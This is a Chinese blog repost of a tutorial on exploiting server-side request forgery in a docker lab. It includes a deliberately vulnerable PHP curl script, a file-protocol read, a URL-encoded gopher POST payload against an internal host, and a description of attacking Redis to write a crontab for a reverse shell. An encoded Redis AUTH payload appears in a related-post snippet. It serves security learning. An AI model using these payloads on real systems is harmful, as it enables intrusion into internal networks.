SSRF学习

最新推荐文章于 2021-10-11 01:04:59 发布
最新推荐文章于 2021-10-11 01:04:59 发布
阅读量100 收藏
点赞数
文章标签: 数据库 php shell
原文链接:http://www.cnblogs.com/hac425/p/9416901.html
版权

前言

SSRF(Server-Side Request Forgery ,服务器端请求伪造) 是一种由攻击者构造形成由服务器发起请求的一个安全漏洞

SSRF的主要攻击目标为外网无法访问的内部系统。

本文记录下各种利用姿势

正文

测试环境

docker pull vulhub/php
存在漏洞的机器: 172.17.0.3
redis服务器: 172.17.0.3

测试代码

<?php

function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

$url = $_GET['url'];
echo $url;
curl($url);

?>

就是获取 url 然后用 curl 去获取页面内容

006daSSqgy1fyi1jmeqmnj316c0l6juv.jpg

file协议读文件

006daSSqgy1fyi1jsm3zcj31220dw75f.jpg

gopher 协议发送 TCP 数据

使用 gopher 协议我们可以向指定端口发送 tcp 数据。

比如向 172.17.0.1:8888 端口发送一个 POST 请求

POST /ssrf.php HTTP/1.1
Host: 192.168.211.131:88
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

pa=1

数据包内容保存到  payload.txt, 然后用 url 编码

import urllib
 
def go():
    f = open("payload.txt")
    content = f.read()
    print urllib.quote(content)
 
if __name__ == "__main__":
    go()

006daSSqgy1fyi1k8v2x7j30vf03yjrr.jpg

然后用

gopher://target_ip:port/_encodepayload

的格式来组成一个 gopher 请求

gopher://172.17.0.1:8888/_POST%20/ssrf.php%20HTTP/1.1%0D%0AHost%3A%20192.168.211.131%3A88%0D%0APragma%3A%20no-cache%0D%0ACache-Control%3A%20no-cache%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit/537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome/64.0.3282.186%20Safari/537.36%0D%0AAccept%3A%20text/html%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2Cimage/webp%2Cimage/apng%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Encoding%3A%20gzip%2C%20deflate%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.9%0D%0AConnection%3A%20close%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%200%0D%0A%0D%0Apa%3D1%0D%0A

如果是直接放到 burp 里面进行发包的话,要记得对 gopher://... 在进行一次 url 编码,原因是服务器对 HTTP 请求包会进行一次 url 解码,这样会损坏 gopher://... 的数据

006daSSqgy1fyi1kgynknj318j0nrgp3.jpg

选中 然后 url 编码即可

006daSSqgy1fyi1kml03tj31b40iqtd5.jpg

可以看到成功接收到了 http 请求。通过 gopher 协议我们可以发送 POST 请求,所以对于内网中的很多 web 漏洞我们都可以利用了。

攻击 redis

首先探测 redis 服务

006daSSqgy1fyi1kx6giij310y0gtgmr.jpg

使用 http 协议来探测即可,如果有 redis 服务监听在 6379 端口会返回

006daSSqgy1fyi1l2h461j31560f1q4g.jpg

于是 枚举 IP 即可, 找到 172.17.0.2 开了 redis

然后生成 payload

006daSSqgy1fyi1l8n2w6j31bj0cwmxu.jpg

这里有一个小坑 :

如果直接用 vim 写入 payload.txt, 它的换行符为 \n, 而 redis 的命令的换行符为 \r\n, 所以需要先用 unix2dos payload.txt转换一下。

006daSSqgy1fyi1lezovqj31b10h7dj7.jpg

写入了 crontab 文件, 不过写入了为啥还是没有反弹 shell

相关链接:

http://www.angelwhu.com/blog/?p=427

http://wonderkun.cc/index.html/?p=670

http://t.cn/RK16Mgy

SSRF漏洞(原理&绕过姿势)

SSRF利用研究及总结

https://04z.net/2017/07/27/SSRF-Attack/

转载于:https://www.cnblogs.com/hac425/p/9416901.html

weixin_30846599
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
国光师傅的SSRF靶场docker环境.zip
01-14
总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好...
乌云峰会猪猪侠ppt-关于SSRF
03-26
该资源是猪猪侠在2016年乌云峰会上发表演讲的PPT(已被转成PDF),内容是关于SSRF漏洞,我之前找这个找了很久,在这里分享出来,供大家参考学习,共同进步。
SSRF的学习
qq_51558360的博客
01-27 595
SSRF漏洞简介 ​SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 形成原因 由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制 SSRF漏洞原理 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如,通过控制前台的请求远程地址加载的响应,来让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务,来造成对内网系统的攻击。 漏洞
SSRF学习挖掘
净邪的博客
06-25 332
什么是SSRF? 服务器端请求伪造(SSRF)是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。(利用一个可发起网络请求的服务当作跳板来攻击其他服务) 攻击者能够利用目标帮助攻击者访问其他想要攻击的目标 A让B帮忙访问C 用一种简单的方法 -攻击者要求服务器为他访问URL 举一个简单的例子: 利用在线翻译,用翻译的服务器访问你所需要的目标站点 假设他内网有许多内网服务器,我们是不是就可以访问到内网了。可以探测一些内网的信息 实操一下: ...
SSRF 学习
weixin_47306547的博客
10-11 326
SSRF 定义 SSRF(Server-Side Request Forgery),即服务器端请求伪造,是一种由攻击者构造形成由服务器端发起的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。 很多 Web 应用都提供了从其他服务器上获取数据的功能。使用用户指定的 URL,Web 应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的 Web 应用作为代理攻击远程和本地服务器。 SSRF 原理 ...
【技术分享】SSRF漏洞学习 .pdf
09-05
SSRF漏洞详解】 SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种网络安全漏洞,它允许攻击者利用服务器的身份,发起对外部资源的请求。这些请求可能原本是服务器内部网络的一部分,对外不可见,...
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
最新发布
01-16
总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好...
redis安全学习小记1
08-03
SSRF(Server-Side Request Forgery)攻击中,攻击者可能利用 `%2A2%0d%0a%244%0d%0aAUTH%0d%0a%246%0d%0a123123%0D%0A`来绕过认证。 Redis支持多种数据类型,包括字符串、哈希、列表、集合和有序集合。这些数据...
Web安全学习笔记.pdf
10-22
笔记的核心部分是常见Web漏洞的攻防,包括SQL注入、XSS跨站脚本、CSRF跨站请求伪造、SSRF服务器端请求伪造、命令注入、目录穿越、文件读取、文件上传、文件包含、XML External Entity(XXE)攻击、模板注入、XPath...
超全的Web渗透自我学习资料合集(64篇).zip
09-30
超全的Web渗透学习资料合集,共64篇。 web渗透: web安全原则 web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 web渗透: 枚举web服务器应用 web渗透: 识别...
完整的Java代码审计学习笔记资源(免费下载)
10-31
java代码审计-ssrf.md 第一的 4年前 java代码审计-ssti.md 第一的 4年前 java代码审计-xss.md 第一的 4年前 java代码审计-xxe.md 第一的 4年前 java代码审计-反序列化.md 添加一些关于 jndi 的内容 3年前 java代码...
network-security:学习web安全练习的靶场,以及总结的思维导图和笔记
03-13
网络安全启用学习网络安全练习过的靶场,笔记,还有一些好文章之后会有一些实战案例靶场:SSRF: 1.ssrf-lab: : 。 ssrf-lab靶场教程: ://www.codenong.com/cs105709428/。 2.ctfhub.com中ssrf模块。XSS: 1.xss...
java俄罗斯方块源码-security-study-tutorial:在线学习资料总结
06-05
java俄罗斯方块源码 security-study-tutorial Summary of online learning materials Awesome Checklist Developer Pentest Mobile Application Security ...SSRF XSS Shooting Buffer Overflow Other
SSRF的学习笔记整理
qq_40671478的博客
10-07 581
SSRF服务器端请求伪造 1.漏洞产生的原因 SSRF形成的原因大多是由于服务端提供了从其他服务器获取数据的功能,并且没有对目标地址进行过滤和限制. 应用程序(外网网站)有可以从其他服务器获取数据的功能,但是服务器并没有对网站的请求进行严格的过滤和限制,导致了用户(攻击者)可以进行任意URL链接访问 2.SSRF的利用 可以通过服务器获取内网信息,如获取内网主机、端口和 banner 信息。(根据服务器返回的信息及返回信息的时间推断内网信息) 对内网的应用程序进行攻击,比如 redis、jboss 等。
ssrf学习
qq_51553814的博客
08-01 129
ctfhub ssrf学习一 内网访问 开启题目,打开网页,直接根据题目意思在url后面加127.0.0.1/flag.php 得到flag 伪协议读取文件 打开连接,根据题目意思,在url后接file:///var/www/html/ file:///是伪协议,伪协议种类有 file:/// dict:// sftp:// ldap:// tftp:// gopher:// 其他种类的伪协议也需要学习 后面的var/www/html是网站的基本目录, 访问完后请求包中发现flag 端口扫描
SSRF漏洞学习
qq_45521281的博客
04-12 616
漏洞解释 SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统) SSRF漏洞形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。 例如,黑客操作服...
学习ssrf相关的知识体系
04-27
好的,关于学习SSRF(Server-Side Request Forgery)相关的知识体系,我可以给你一些建议: 1. 理解SSRF的概念和原理:SSRF是指攻击者利用服务器端应用程序的漏洞,构造恶意请求,从而在未经授权的情况下访问和攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值